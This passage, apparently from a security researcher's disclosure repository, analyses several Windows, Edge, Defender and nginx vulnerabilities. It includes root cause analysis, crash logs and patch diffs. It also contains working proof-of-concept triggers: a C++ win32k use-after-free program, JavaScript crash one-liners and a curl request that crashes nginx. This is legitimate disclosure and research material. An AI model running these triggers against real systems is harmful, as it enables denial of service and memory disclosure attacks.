771b3a86 00f81660 7ffdf000 00000000 ntdll!__RtlUserThreadStart+0x70 77 | 0b 002bfea0 00000000 00f81660 7ffdf000 00000000 ntdll!_RtlUserThreadStart+0x1b 78 | 79 | The PoC code 80 | 81 | Basically the PoC code works as follows: 82 | 1. Create some HDCs 83 | 2. Create a bitmap 84 | 3. Delete a bitmap 85 | 4. Call BitBlt() to copy the deleted bitmap from hdc to another hdc. 86 | 87 | Root Cause 88 | 89 | Within win32k!NtGdiBitBltInternal(), there is a local variable which is first filled with pointers to graphical objects in operation: 90 | 91 | .text:BF8D7C8D loc_BF8D7C8D: ; CODE XREF: NtGdiBitBltInternal(x,x,x,x,x,x,x,x,x,x,x)+1C0j 92 | .text:BF8D7C8D lea ecx, [ebp+pointers_array] 93 | .text:BF8D7C93 call ??0DEVLOCKBLTOBJ@@QAE@XZ ; DEVLOCKBLTOBJ::DEVLOCKBLTOBJ(void) 94 | .text:BF8D7C98 push 0 95 | .text:BF8D7C9A lea eax, [ebp+var_2C] 96 | .text:BF8D7C9D push eax 97 | .text:BF8D7C9E lea eax, [ebp+var_20] 98 | .text:BF8D7CA1 push eax 99 | .text:BF8D7CA2 lea ecx, [ebp+pointers_array] 100 | .text:BF8D7CA8 call ?bLock@DEVLOCKBLTOBJ@@QAEHAAVXDCOBJ@@0H@Z ; DEVLOCKBLTOBJ::bLock(XDCOBJ &,XDCOBJ &,int) 101 | 102 | In some conditions, this array is passed to DEVLOCKBLTOBJ destructor, in which the crash happens: 103 | 104 | .text:BF8D81EF jmp_crash: ; CODE XREF: NtGdiBitBltInternal(x,x,x,x,x,x,x,x,x,x,x)+2EBj 105 | .text:BF8D81EF ; NtGdiBitBltInternal(x,x,x,x,x,x,x,x,x,x,x)+70Ej ... 106 | .text:BF8D81EF lea ecx, [ebp+pointers_array] ; culprit ptr array 107 | .text:BF8D81F5 call ??1DEVLOCKBLTOBJ@@QAE@XZ ; DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ(void) 108 | .text:BF8D81FA jmp short loc_BF8D8227 109 | 110 | The crash occures because the code tries to dereference a dangling pointer, i.e. the pointer to the previously freed bitmap. 111 | 112 | Why it happens? Compare unpatched vs. patched code at DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ: 113 | 114 | .text:BF8D663B mov ecx, [esi+20h] ; source hdc 115 | .text:BF8D663E mov eax, [eax] 116 | .text:BF8D6640 push ebx 117 | .text:BF8D6641 push 1 118 | .text:BF8D6643 push dword ptr [ecx+14h] ; crash 0171 119 | .text:BF8D6646 push dword ptr [eax] 120 | .text:BF8D6648 call _hbmSelectBitmap@16 ; hbmSelectBitmap(x,x,x,x) 121 | 122 | patched: 123 | .text:BF8D6703 mov eax, [eax] 124 | .text:BF8D6705 push ebx 125 | .text:BF8D6706 push 1 126 | .text:BF8D6708 push dword ptr [esi+20h] ; a different pointer/offset 127 | .text:BF8D670B push dword ptr [eax] 128 | .text:BF8D670D call _hbmSelectBitmap@16 ; hbmSelectBitmap(x,x,x,x) 129 | 130 | The patch affects pointer dereference order, i.e. a double dereference is patched to a single dereference, as in *(*(ptr+0x20)+0x14) vs. *(ptr+0x20). Same change was applied to DEVLOCKBLTOBJ::vUnmap (called from within the destructor). 131 | 132 | But the main patch is in DEVLOCKBLTOBJ::bLock() that is called from the DEVLOCKBLTOBJ constructor, which presumably is the culprit of populating the operational array with dangling pointers. Most relevant changed block: 133 | 134 | unpatched: 135 | .text:BF8D78DF mov eax, [ebp+arg_4] 136 | .text:BF8D78E2 mov [esi+24h], eax 137 | .text:BF8D78E5 mov eax, [eax] 138 | .text:BF8D78E7 mov eax, [eax+1F8h] 139 | .text:BF8D78ED mov [esi+20h], eax 140 | .text:BF8D78F0 add eax, 10h 141 | .text:BF8D78F3 push eax 142 | .text:BF8D78F4 lea edi, [esi+14h] 143 | .text:BF8D78F7 push edi 144 | .text:BF8D78F8 call ?bCopySurface@@YGHPAVSURFMEM@@PAU_SURFOBJ@@@Z ; bCopySurface(SURFMEM *,_SURFOBJ *) 145 | .text:BF8D78FD test eax, eax 146 | .text:BF8D78FF jnz short loc_BF8D792A 147 | 148 | patched: 149 | .text:BF8D79B9 mov [esi+24h], ebx 150 | .text:BF8D79BC mov eax, [ebx] 151 | .text:BF8D79BE mov eax, [eax+1F8h] 152 | .text:BF8D79C4 mov eax, [eax+14h] 153 | .text:BF8D79C7 mov [esi+20h], eax 154 | .text:BF8D79CA mov eax, [ebx] 155 | .text:BF8D79CC mov eax, [eax+1F8h] 156 | .text:BF8D79D2 add eax, 10h 157 | .text:BF8D79D5 push eax 158 | .text:BF8D79D6 lea edi, [esi+14h] 159 | .text:BF8D79D9 push edi 160 | .text:BF8D79DA call ?bCopySurface@@YGHPAVSURFMEM@@PAU_SURFOBJ@@@Z ; bCopySurface(SURFMEM *,_SURFOBJ *) 161 | .text:BF8D79DF test eax, eax 162 | .text:BF8D79E1 jnz short loc_BF8D7A0C 163 | 164 | The patched code changes the way how the DEVLOCKBLTOBJ operational array of pointers is populated, apparently leaving the dangling pointer away. 165 | 166 | Notes 167 | 168 | BitBlt function 169 | The BitBlt function performs a bit-block transfer of the color data corresponding to a rectangle of pixels from the specified source device context into a destination device context. 170 | 171 | BOOL BitBlt( 172 | _In_ HDC hdcDest, 173 | _In_ int nXDest, 174 | _In_ int nYDest, 175 | _In_ int nWidth, 176 | _In_ int nHeight, 177 | _In_ HDC hdcSrc, 178 | _In_ int nXSrc, 179 | _In_ int nYSrc, 180 | _In_ DWORD dwRop 181 | ); 182 | 183 | https://msdn.microsoft.com/ru-ru/library/windows/desktop/dd183370(v=vs.85).aspx 184 | 185 | 186 | 187 | SelectObject function 188 | The SelectObject function selects an object into the specified device context (DC). The new object replaces the previous object of the same type. 189 | HGDIOBJ SelectObject( 190 | _In_ HDC hdc, 191 | _In_ HGDIOBJ hgdiobj 192 | ); 193 | 194 | https://msdn.microsoft.com/en-us/library/windows/desktop/dd162957(v=vs.85).aspx -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/testcase/poc_0171.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * cl.exe poc.cpp user32.lib gdi32.lib 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | __declspec(noinline) HBITMAP __stdcall NtGdiCreateCompatibleBitmap(HANDLE hdc, DWORD d1, DWORD d2) { 10 | __asm { 11 | push d2 12 | push d1 13 | push hdc 14 | push 0x0 15 | mov eax, 0x101f 16 | mov edx, 0x7ffe0300 17 | call dword ptr [edx] 18 | add esp, 0x10 19 | } 20 | } 21 | 22 | __declspec(noinline) int __stdcall NtGdiSelectBitmap(HDC hdc, HBITMAP hbmp) { 23 | __asm { 24 | push hbmp 25 | push hdc 26 | push 0x0 27 | mov eax, 0x110b 28 | mov edx, 0x7ffe0300 29 | call dword ptr [edx] 30 | add esp, 0xc 31 | } 32 | } 33 | 34 | __declspec(noinline) HBRUSH __stdcall NtGdiDeleteObjectApp(HANDLE h) { 35 | __asm { 36 | push h 37 | push 0x0 38 | mov eax, 0x107d 39 | mov edx, 0x7ffe0300 40 | call dword ptr [edx] 41 | add esp, 0x8 42 | } 43 | } 44 | 45 | 46 | int _tmain(int argc, _TCHAR* argv[]) 47 | { 48 | HDC hdc1 = GetWindowDC(GetDesktopWindow()); 49 | printf("[-] hdc1: %08x\n", hdc1); 50 | HBITMAP hbmp = NtGdiCreateCompatibleBitmap(hdc1, 0x5, 0x42); 51 | printf("[-] hbmp: %08x\n", hbmp); 52 | HDC hdc2 = CreateCompatibleDC(hdc1); 53 | printf("[-] hdc2: %08x\n", hdc2); 54 | NtGdiSelectBitmap(hdc2, hbmp); 55 | NtGdiDeleteObjectApp(hbmp); 56 | HDC hdc3 = CreateDCA(0, "Microsoft XPS Document Writer", 0, 0); 57 | printf("[-] hdc3: %08x\n", hdc3); 58 | BitBlt(hdc3, 0x62,0x55, 0x42,0x8000,hdc2,0xe1, 0xc4, 0xbb0226); 59 | } 60 | -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/testcase/poc_0171.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2016-0171_win32k/testcase/poc_0171.exe -------------------------------------------------------------------------------- /CVE-2017-XXXX_Jscript9_IE/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2017-XXXX: Jscript9 Type Confusion Remote Code Execution Vulnerability 4 | 5 | A very nice type confusion in IE's branch of ChakraCore, exploitable for both a code execution and an information disclosure. 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage (independently) 10 | Vulnerability discovery: unidentified reporter 11 | Vulnerability analysis: Alisa Esage 12 | Exploit developed: Alisa Esage -------------------------------------------------------------------------------- /CVE-2017-XXXX_Jscript9_IE/screens/debugger_poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2017-XXXX_Jscript9_IE/screens/debugger_poc.png -------------------------------------------------------------------------------- /CVE-2017-XXXX_Jscript9_IE/screens/exploit_demo.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2017-XXXX_Jscript9_IE/screens/exploit_demo.mp4 -------------------------------------------------------------------------------- /CVE-2017-XXXX_Jscript9_IE/testcases/test-crash.html: -------------------------------------------------------------------------------- 1 | 2 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /CVE-2017-XXXX_Jscript9_IE/testcases/test-leak.html: -------------------------------------------------------------------------------- 1 | 2 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /CVE-2017-XXXX_WindowsDefender/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2017-FFFF: Windows Defender Javascript Use-after-free Vulnerability 4 | 5 | This is a "0.5 day" vulnerability: technically an 0-day that was never patched or disclosed, it was mitigated around mid 2017 as a class with several other bugs via refactoring of the Windows Defender's allocator. 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | -------------------------------------------------------------------------------- /CVE-2017-XXXX_WindowsDefender/test.js: -------------------------------------------------------------------------------- 1 | var l = {valueOf: gc, toString: gc}; function gc() { eval("var a = Object(); var b = Object(); var s='a'; for(var i=0; i < 0x800; i++){s=s.replace('a', 'aaaaaaaa')};");}; Array.prototype.splice(l) 2 | -------------------------------------------------------------------------------- /CVE-2018-0893_MSEdge/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2018-0893: Microsoft Edge Type Confusion Information Disclosure Vulnerability 4 | 5 | Exploitation: an exercise in how far you can take a severely constrained vulnerability, almost "just a bug". 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: Alisa Esage 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | Proof of concept exploit: Alisa Esage -------------------------------------------------------------------------------- /CVE-2018-0893_MSEdge/analysis.txt: -------------------------------------------------------------------------------- 1 | CVE-2018-0893: Microsoft Edge Scripting Engine Memory Corruption Vulnerability 2 | 3 | There is a vulnerability in Edge's DOM accessor functions, such as DOMFastPath::EntrySimpleSlotGetter. The templated code of getters fails to sanitize the `this` value of the Javascript execution context, which may be user controlled via .call or .apply. This leads to a type confusion, where a user-provided value is treated as a pointer to a Javascript object. The type confusion has security implications, and can possibly be leveraged into a number of exploitable conditions. 4 | 5 | *** 6 | 7 | Minimal test-case is as follows: 8 | 9 | var o = window.__lookupGetter__('event').call(0x42424242 >> 1) // crash at 0x42424247 on a 32-bit system 10 | 11 | Tested on Windows 10 RS3 x64/x32, Nov.2017 12 | 13 | *** 14 | 15 | The crash happens when Chakra dereferences the user-provided pointer value in order to determine the `this` object's type via chakra!Js::JavascriptTypedObjectSlotAccessorFunction::InstanceOf: 16 | 17 | (d44.102c): Access violation - code c0000005 (!!! second chance !!!) 18 | eax=00000003 ebx=0867cb80 ecx=0867cb80 edx=42424243 esi=000011f6 edi=04efcdf0 19 | eip=5c5512f5 esp=04efcd44 ebp=04efcd50 iopl=0 nv up ei ng nz ac po cy 20 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210293 21 | chakra!Js::JavascriptTypedObjectSlotAccessorFunction::InstanceOf+0x23: 22 | 5c5512f5 8b7a04 mov edi,dword ptr [edx+4] ds:0023:42424247=???????? 23 | 0:009> kb 24 | # ChildEBP RetAddr Args to Child 25 | 00 04efcd50 5c677e28 42424243 04efcd88 04efcd78 chakra!Js::JavascriptTypedObjectSlotAccessorFunction::InstanceOf+0x23 26 | 01 04efcd60 5c414c54 42424243 00000001 02000001 chakra!Js::JavascriptTypedObjectSlotAccessorFunction::ValidateThisInstance+0xe 27 | 02 04efcd78 5c5971b1 0867cb80 02000001 42424243 chakra!DOMFastPath<7>::EntrySimpleSlotGetter+0x54 28 | 03 04efcdc0 5c4f95da 02000001 04efcdf0 00000002 chakra!Js::JavascriptFunction::CallFunction<1>+0x91 29 | 04 04efcde0 5c4c27a0 0867d0c0 02000002 42424243 chakra!Js::JavascriptFunction::EntryCall+0xaa 30 | 05 04efce30 5c4c5167 0887a055 0867d0c0 00000000 chakra!Js::InterpreterStackFrame::OP_CallCommon > > >+0xd0 31 | 06 04efce68 5c4c8ab1 0887a055 04efcfac 08890000 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex > >+0x77 32 | 07 04efcea0 5c4c6ecd b80b6763 04efcee0 047161b0 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x101 33 | 08 04efced8 5c4caaa2 0887a000 0887a05e 00000000 chakra!Js::InterpreterStackFrame::Process+0x10d 34 | 09 04efd088 5c4cbc38 04efd0b8 00000000 00000000 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x3c2 35 | 0a 04efd0b4 088b0fe2 04efd0c8 04efd104 5c5971b1 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x38 36 | ... 37 | 38 | The reason is that in ChakraCore, JavascriptTypedObjectSlotAccessorFunction::InstanceOf fails to check whether the thisObj is actually an object pointer, and proceeds to call JavascriptOperators::GetTypeId on it, which in turn casts it to RecyclableObject and proceeds to dereference without any checks: 39 | 40 | bool JavascriptTypedObjectSlotAccessorFunction::InstanceOf(Var thisObj) 41 | { 42 | int allowedTypeId = GetAllowedTypeId(); 43 | TypeId typeId = Js::JavascriptOperators::GetTypeId(thisObj); <<<<<<< -> RecyclableObject::FromVar(aValue) -> this->GetType()->GetTypeId(); 44 | if (typeId == allowedTypeId) 45 | { 46 | ... 47 | } 48 | 49 | Note that EntrySimpleSlotGetter actually tries to validate the `this` instance via ::ValidateThisInstance, however it only validates if it's of an allowed type, and not that it's actually a valid pointer. 50 | 51 | The actual type confusion happens down in the stack, in JavascriptFunction::EntryCall: 52 | 53 | Var JavascriptFunction::EntryCall(RecyclableObject* function, CallInfo callInfo, ...) 54 | { 55 | ... 56 | RecyclableObject *pFunc = RecyclableObject::FromVar(args[0]); 57 | if (argCount == 1) 58 | { 59 | args.Values[0] = scriptContext->GetLibrary()->GetUndefined(); 60 | } 61 | else <<<<<<<<<<<< the `this` (args[1]) should be sanitized before this, as downstream funcs don't assume a custom `this` 62 | { 63 | /// 64 | /// Remove function object from the arguments and pass the rest 65 | /// 66 | for (uint i = 0; i < args.Info.Count - 1; ++i) 67 | { 68 | args.Values[i] = args.Values[i + 1]; 69 | } 70 | args.Info.Count = args.Info.Count - 1; 71 | } 72 | 73 | /// 74 | /// Call the [[Call]] method on the function object 75 | /// 76 | return JavascriptFunction::CallFunction(pFunc, pFunc->GetEntryPoint(), args); 77 | } 78 | 79 | Since the root cause is down in the stack, there may exist (or may be added in the future) other ways to reach the vulnerable code path, other than via DOM getters. 80 | 81 | *** 82 | 83 | Below I am providing a brief theoretical analysis of possible security implications of this bug. 84 | 85 | 1. Remote code execution 86 | 87 | Normally, EntrySimpleSlotGetter would obtain a property pointer from the `this` memory address, and cast it back to the Javascript context: 88 | 89 | .text:10134A0C loc_10134A0C: ; CODE XREF: DOMFastPath<8>::EntrySimpleSlotGetter(Js::RecyclableObject *,Js::CallInfo,...)+56j 90 | .text:10134A0C mov eax, [esi] 91 | .text:10134A0E mov eax, [eax+38h] 92 | 93 | That might allow for direct code execution via eg. returnedObject.someFunction(). 94 | However in this particular case, it fails half way through due to the Tagged Integer check in ::InstanceOf -> JsVarToExtension(). 95 | 96 | Since the root cause is actually down in the stack, remote code executaion remains a possiblity. 97 | 98 | 2. Info leak 99 | 100 | In EntrySimpleSlotGetter there is a code path that will throw a TypeError instead of crashing, in case that it finds a particular shape at the `this` memory address (eg. an object of an unsupported type). This can be leveraged as a signaling channel allowing determine the state of the heap, eg. if a heap spray was successful and/or if there exists a Javascript object at the provided memory location. 101 | 102 | Proof-of-concept: poc-typeerror.html 103 | 104 | Note that, since Edge tabs crash silently, an attacker has infinite number of tries to probe the heap layout. 105 | 106 | 3. Security bypass / breach of standards 107 | 108 | Due to dysfunctional type checks, this issue can in theory be used to retrieve a Javascript DOM object/property which we shouldn't have access to, or bypass Same Origin Policy for example. In addition, there may be subtle implications in the context of garbage collection, if we can obtain a reference to an object/property that we don't own, which can interfere with rooting/marking and possibly lead to a use-after-free. -------------------------------------------------------------------------------- /CVE-2018-0893_MSEdge/exploit/PoC_infoleak.html: -------------------------------------------------------------------------------- 1 | 57 | -------------------------------------------------------------------------------- /CVE-2018-0893_MSEdge/testcase/test-crash.html: -------------------------------------------------------------------------------- 1 | 12 | -------------------------------------------------------------------------------- /CVE-2018-16845_nginx_mp4/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2018-16845: nginx mp4 module Out Of Bounds Read Information Disclosure Vulnerability 4 | 5 | [Advisory (Zero Day Engineering)](https://zerodayengineering.com/exploits/nginx-mp4-infoleak.html) 6 | 7 | ### Credits 8 | 9 | Vulnerability discovery: unknown 10 | Vulnerability analysis: Alisa Esage 11 | Proof of concept: Alisa Esage 12 | -------------------------------------------------------------------------------- /CVE-2018-16845_nginx_mp4/asan.log: -------------------------------------------------------------------------------- 1 | ==29767==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f298175794c at pc 0x7f2984fee57d bp 0x7ffca77efea0 sp 0x7ffca77ef650 2 | READ of size 2771899 at 0x7f298175794c thread T0 3 | #0 0x7f2984fee57c (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x4257c) 4 | #1 0x7f2984feeb27 in __interceptor_writev (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x42b27) 5 | #2 0x55b674f723fd in ngx_writev src/os/unix/ngx_writev_chain.c:189 6 | #3 0x55b674f81707 in ngx_linux_sendfile_chain src/os/unix/ngx_linux_sendfile_chain.c:188 7 | #4 0x55b674fff608 in ngx_http_write_filter src/http/ngx_http_write_filter_module.c:254 8 | #5 0x55b675002299 in ngx_http_chunked_body_filter src/http/modules/ngx_http_chunked_filter_module.c:115 9 | #6 0x55b67500778f in ngx_http_gzip_body_filter src/http/modules/ngx_http_gzip_filter_module.c:329 10 | #7 0x55b67500b2e5 in ngx_http_postpone_filter src/http/ngx_http_postpone_filter_module.c:91 11 | #8 0x55b67501249f in ngx_http_ssi_body_filter src/http/modules/ngx_http_ssi_filter_module.c:413 12 | #9 0x55b6750198c1 in ngx_http_charset_body_filter src/http/modules/ngx_http_charset_filter_module.c:557 13 | #10 0x55b67502113d in ngx_http_trailers_filter src/http/modules/ngx_http_headers_filter_module.c:264 14 | #11 0x55b674f147a5 in ngx_output_chain src/core/ngx_output_chain.c:214 15 | #12 0x55b675022675 in ngx_http_copy_filter src/http/ngx_http_copy_filter_module.c:152 16 | #13 0x55b675005950 in ngx_http_range_body_filter src/http/modules/ngx_http_range_filter_module.c:635 17 | #14 0x55b674f99a7e in ngx_http_output_filter src/http/ngx_http_core_module.c:1770 18 | #15 0x55b675080541 in ngx_http_mp4_handler src/http/modules/ngx_http_mp4_module.c:657 19 | #16 0x55b674f9a73f in ngx_http_core_content_phase src/http/ngx_http_core_module.c:1169 20 | #17 0x55b674f8b262 in ngx_http_core_run_phases src/http/ngx_http_core_module.c:858 21 | #18 0x55b674f8b442 in ngx_http_handler src/http/ngx_http_core_module.c:841 22 | #19 0x55b674fa2d9a in ngx_http_process_request src/http/ngx_http_request.c:1954 23 | #20 0x55b674facaae in ngx_http_process_request_headers src/http/ngx_http_request.c:1379 24 | #21 0x55b674fad67d in ngx_http_process_request_line src/http/ngx_http_request.c:1050 25 | #22 0x55b674faf4bb in ngx_http_wait_request_handler src/http/ngx_http_request.c:499 26 | #23 0x55b674f80fa9 in ngx_epoll_process_events src/event/modules/ngx_epoll_module.c:902 27 | #24 0x55b674f61caa in ngx_process_events_and_timers src/event/ngx_event.c:242 28 | #25 0x55b674f7b38d in ngx_worker_process_cycle src/os/unix/ngx_process_cycle.c:750 29 | #26 0x55b674f76b36 in ngx_spawn_process src/os/unix/ngx_process.c:199 30 | #27 0x55b674f7881e in ngx_start_worker_processes src/os/unix/ngx_process_cycle.c:359 31 | #28 0x55b674f7c95d in ngx_master_process_cycle src/os/unix/ngx_process_cycle.c:131 32 | #29 0x55b674f08dfc in main src/core/nginx.c:382 33 | #30 0x7f29847f12e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0) 34 | #31 0x55b674f05a09 in _start (/home/am/Test/nginx/nginx-1.15.5-asan/sbin/nginx+0x5ea09) 35 | 36 | 0x7f298175794c is located 0 bytes to the right of 192844-byte region [0x7f2981728800,0x7f298175794c) 37 | allocated by thread T0 here: 38 | #0 0x7f298506dd28 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.3+0xc1d28) 39 | #1 0x55b674f6ea54 in ngx_alloc src/os/unix/ngx_alloc.c:22 40 | 41 | SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.3+0x4257c) 42 | Shadow bytes around the buggy address: 43 | 0x0fe5b02e2ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 | 0x0fe5b02e2ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 | 0x0fe5b02e2ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 | 0x0fe5b02e2f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 | 0x0fe5b02e2f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 | =>0x0fe5b02e2f20: 00 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa 49 | 0x0fe5b02e2f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 50 | 0x0fe5b02e2f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 51 | 0x0fe5b02e2f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 52 | 0x0fe5b02e2f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 53 | 0x0fe5b02e2f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 54 | Shadow byte legend (one shadow byte represents 8 application bytes): 55 | Addressable: 00 56 | Partially addressable: 01 02 03 04 05 06 07 57 | Heap left redzone: fa 58 | Heap right redzone: fb 59 | Freed heap region: fd 60 | Stack left redzone: f1 61 | Stack mid redzone: f2 62 | Stack right redzone: f3 63 | Stack partial redzone: f4 64 | Stack after return: f5 65 | Stack use after scope: f8 66 | Global redzone: f9 67 | Global init order: f6 68 | Poisoned by user: f7 69 | Container overflow: fc 70 | Array cookie: ac 71 | Intra object redzone: bb 72 | ASan internal: fe 73 | Left alloca redzone: ca 74 | Right alloca redzone: cb 75 | ==29767==ABORTING -------------------------------------------------------------------------------- /CVE-2018-16845_nginx_mp4/nginx.conf: -------------------------------------------------------------------------------- 1 | 2 | #user nobody; 3 | worker_processes 1; 4 | 5 | error_log logs/error.log; 6 | error_log logs/error.log notice; 7 | error_log logs/error.log info; 8 | 9 | pid logs/nginx.pid; 10 | 11 | 12 | events { 13 | worker_connections 1024; 14 | } 15 | 16 | 17 | http { 18 | include mime.types; 19 | default_type application/octet-stream; 20 | 21 | log_format main '$remote_addr - $remote_user [$time_local] "$request" ' 22 | '$status $body_bytes_sent "$http_referer" ' 23 | '"$http_user_agent" "$http_x_forwarded_for"'; 24 | 25 | access_log logs/access.log main; 26 | 27 | sendfile on; 28 | #tcp_nopush on; 29 | 30 | #keepalive_timeout 0; 31 | keepalive_timeout 65; 32 | 33 | #gzip on; 34 | 35 | server { 36 | listen 80; 37 | server_name localhost; 38 | 39 | #charset koi8-r; 40 | 41 | #access_log logs/host.access.log main; 42 | 43 | location / { 44 | root html; 45 | index index.html index.htm; 46 | } 47 | 48 | location /video/ { 49 | mp4; 50 | mp4_buffer_size 1m; 51 | mp4_max_buffer_size 5m; 52 | } 53 | 54 | #error_page 404 /404.html; 55 | 56 | # redirect server error pages to the static page /50x.html 57 | # 58 | error_page 500 502 503 504 /50x.html; 59 | location = /50x.html { 60 | root html; 61 | } 62 | 63 | # proxy the PHP scripts to Apache listening on 127.0.0.1:80 64 | # 65 | #location ~ \.php$ { 66 | # proxy_pass http://127.0.0.1; 67 | #} 68 | 69 | # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 70 | # 71 | #location ~ \.php$ { 72 | # root html; 73 | # fastcgi_pass 127.0.0.1:9000; 74 | # fastcgi_index index.php; 75 | # fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; 76 | # include fastcgi_params; 77 | #} 78 | 79 | # deny access to .htaccess files, if Apache's document root 80 | # concurs with nginx's one 81 | # 82 | #location ~ /\.ht { 83 | # deny all; 84 | #} 85 | } 86 | 87 | 88 | # another virtual host using mix of IP-, name-, and port-based configuration 89 | # 90 | #server { 91 | # listen 8000; 92 | # listen somename:8080; 93 | # server_name somename alias another.alias; 94 | 95 | # location / { 96 | # root html; 97 | # index index.html index.htm; 98 | # } 99 | #} 100 | 101 | 102 | # HTTPS server 103 | # 104 | #server { 105 | # listen 443 ssl; 106 | # server_name localhost; 107 | 108 | # ssl_certificate cert.pem; 109 | # ssl_certificate_key cert.key; 110 | 111 | # ssl_session_cache shared:SSL:1m; 112 | # ssl_session_timeout 5m; 113 | 114 | # ssl_ciphers HIGH:!aNULL:!MD5; 115 | # ssl_prefer_server_ciphers on; 116 | 117 | # location / { 118 | # root html; 119 | # index index.html index.htm; 120 | # } 121 | #} 122 | 123 | } 124 | -------------------------------------------------------------------------------- /CVE-2018-16845_nginx_mp4/patch.txt: -------------------------------------------------------------------------------- 1 | --- src/http/modules/ngx_http_mp4_module.c 2 | +++ src/http/modules/ngx_http_mp4_module.c 3 | @@ -942,6 +942,13 @@ ngx_http_mp4_read_atom(ngx_http_mp4_file 4 | atom_size = ngx_mp4_get_64value(atom_header + 8); 5 | atom_header_size = sizeof(ngx_mp4_atom_header64_t); 6 | 7 | + if (atom_size < sizeof(ngx_mp4_atom_header64_t)) { 8 | + ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, 9 | + "\"%s\" mp4 atom is too small:%uL", 10 | + mp4->file.name.data, atom_size); 11 | + return NGX_ERROR; 12 | + } 13 | + 14 | } else { 15 | ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, 16 | "\"%s\" mp4 atom is too small:%uL", 17 | 18 | 19 | -------------------------------------------------------------------------------- /CVE-2018-16845_nginx_mp4/readme.txt: -------------------------------------------------------------------------------- 1 | nginx mp4 module DoS & Infoleak Vulnerability (2018) 2 | 3 | This proof-of-concept exploit demonstrates an out of bounds read in nginx v1.15.5 heap. This can be worked up to an information disclosure exploit with a bit of extra work. The bug itself, and potentially the exploit, may affect earlier nginx versions. 4 | 5 | The bug was reverse-engineered by me from nginx security patches [1], and exploit made public in this release for the first time. 6 | 7 | CVE ID: CVE-2018-16845 8 | Exploit developer: Alisa Esage (Zero Day Engineering) 9 | Bug finder: Unknown 10 | Technical details: *to be done* 11 | 12 | 13 | Prerequisites 14 | 15 | * nginx v1.15.5 16 | * built with the option "--with-http_mp4_module" (non default) 17 | 18 | 19 | Impact 20 | 21 | Possible attack scenarios for this bug range from a denial of service (DoS) of the nginx worker process, to leaking some bytes (infoleak) from the nginx worker process heap, depending on the implementation of the exploit. 22 | 23 | In case of a DoS attack scenario, the attacker would trigger the bug to crash the nginx worker process. The worker process will be promptly respawned by the parent nginx process after the crash. By repeating the exploit in a loop, the DoS attack can be made persistent in effect, and/or cause a server-global resource exaustion. 24 | 25 | In case of an Infoleak attack scenario, the attacker would trigger the bug to read some bytes from the nginx worker process heap. This primitive can be leveraged in an RCE exploit chain to break ASLR, or in a stand-alone setting to disclose potentially sensitive data from the nginx worker process, such as some passwords or the backend configuration. 26 | 27 | In terms of the volume of affected distributions, the impact is not clear. One indicator that the impact may be substantial is that this bug is published in the official nginx security advisory, something that nginx team is extremely reluctant to do (full list of nginx security issues in the global CVE database is at least four times longer than the official list published on the product website). [2] 28 | 29 | A realistic attack scenario would use a second bug either in nginx or in other remotely accessible server software for an arbitrary file write on the server. 30 | 31 | 32 | How to test 33 | 34 | Trigger the bug remotely: 35 | curl http://servername/video/test.mp4?start=2 36 | 37 | Test environment configuration is left as an exercise for the reader. 38 | 39 | 40 | Notes 41 | 42 | Take a look at the crashing stack trace. ngx_writev is the wrapper API in nginx that writes to client connection socket. It means that, while this is a minimalist crash-PoC, the possibility of an infoleak attack is strongly proven. 43 | 44 | The impact of the infoleak attack is somewhat limited (hopefully), because nginx spawns one worker process per each connection. So, it should not be possible to read other clients' 